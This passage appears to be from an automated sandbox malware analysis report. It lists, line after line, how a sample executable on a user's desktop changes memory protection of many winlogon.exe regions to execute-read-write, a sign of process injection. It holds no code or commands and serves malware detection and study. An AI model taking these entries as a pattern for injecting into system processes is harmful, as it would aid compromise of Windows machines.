Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CDD2000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CDD4000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CDD6000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CDE0000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CDE1000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CDF2000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CDF4000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CDF6000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CE00000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CE01000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CE12000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CE14000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CE16000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CE20000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CE21000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CE32000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CE34000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CE36000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CE40000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CE41000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CE52000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CE54000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CE56000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CE60000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CE61000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CE72000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CE74000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CE76000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CE80000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CE81000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CE92000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CE94000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CE96000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CEA0000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CEA1000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CEB2000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CEB4000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CEB6000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CEC0000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CEC1000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CED2000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CED4000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CED6000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: CEE0000 protect: page readonly
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: CEE1000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: CEF2000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: CEF4000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: CEF6000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: CF00000 protect: page readonly
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: CF01000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: CF12000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: CF14000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: CF16000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: CF20000 protect: page readonly
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: CF21000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: CF32000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: CF34000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: CF36000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: CF40000 protect: page readonly
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: CF41000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: CF52000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: CF54000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: CF56000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: CF60000 protect: page readonly
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: CF61000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: CF72000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: CF74000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: CF76000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: CF80000 protect: page readonly
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: CF81000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: CF92000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: CF94000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: CF96000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: CFA0000 protect: page readonly
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: CFA1000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: CFB2000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: CFB4000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: CFB6000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: CFC0000 protect: page readonly
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: CFC1000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: CFD2000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: CFD4000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: CFD6000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: CFE0000 protect: page readonly
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: CFE1000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: CFF2000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: CFF4000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: CFF6000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D000000 protect: page readonly
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D001000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D012000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D014000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D016000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D020000 protect: page readonly
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D021000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D032000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D034000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D036000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D040000 protect: page readonly
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D041000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D052000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D054000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D056000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D060000 protect: page readonly
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D061000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D072000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D074000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D076000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D080000 protect: page readonly
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D081000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D092000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D094000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D096000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D0A0000 protect: page readonly
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D0A1000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D0B2000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D0B4000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D0B6000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D0C0000 protect: page readonly
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D0C1000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D0D2000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D0D4000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D0D6000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D0E0000 protect: page readonly
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D0E1000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D0F2000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D0F4000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D0F6000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D100000 protect: page readonly
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D101000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D112000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D114000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D116000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D120000 protect: page readonly
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D121000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D132000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D134000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D136000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D140000 protect: page readonly
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D141000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D152000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D154000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D156000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D160000 protect: page readonly
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D161000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D172000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D174000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D176000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D180000 protect: page readonly
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D181000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D192000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D194000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D196000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D1A0000 protect: page readonly
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D1A1000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D1B2000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D1B4000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D1B6000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D1C0000 protect: page readonly
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D1C1000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D1D2000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D1D4000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D1D6000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D1E0000 protect: page readonly
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D1E1000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D1F2000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D1F4000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D1F6000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D200000 protect: page readonly
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D201000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D212000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D214000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D216000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D220000 protect: page readonly
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D221000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D232000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D234000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D236000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D240000 protect: page readonly
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D241000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D252000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D254000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D256000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D260000 protect: page readonly
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D261000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D272000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D274000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D276000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D280000 protect: page readonly
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D281000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D292000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D294000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D296000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D2A0000 protect: page readonly
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D2A1000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D2B2000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D2B4000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D2B6000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D2C0000 protect: page readonly
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D2C1000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D2D2000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D2D4000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D2D6000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D2E0000 protect: page readonly
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D2E1000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D2F2000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D2F4000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D2F6000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D300000 protect: page readonly
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D301000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe Memory protected: C:\Windows\System32\winlogon.exe base: D312000 protect: page execute and read and write
